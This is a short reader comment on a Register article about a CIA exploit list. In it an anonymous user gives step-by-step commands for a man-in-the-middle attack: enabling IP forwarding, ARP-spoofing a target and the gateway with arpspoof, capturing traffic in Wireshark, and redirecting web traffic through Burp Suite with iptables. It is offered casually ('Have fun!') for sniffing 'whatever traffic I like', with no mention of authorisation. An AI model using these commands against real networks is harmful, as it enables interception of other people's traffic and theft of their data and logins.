Reply to post: Re: Slightly off topic...

That CIA exploit list in full: The good, the bad, and the very ugly

Anonymous Coward
Anonymous Coward

Re: Slightly off topic...

I just use arpspoof on a linux box to sniff whatever traffic I like:

echo 1 > /proc/sys/net/ipv4/ip_forward (to activate port forwarding)

arpspoof -i wlan0 -t <target> <default gateway> -r (to arpspoof both ways).

Then you just run wireshark. If you want to specifically target HTTP/HTTPS traffic you fire up burpsuite on port 8080 then use an iptables rule to forward all 80/443 traffic to that. Have fun!

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon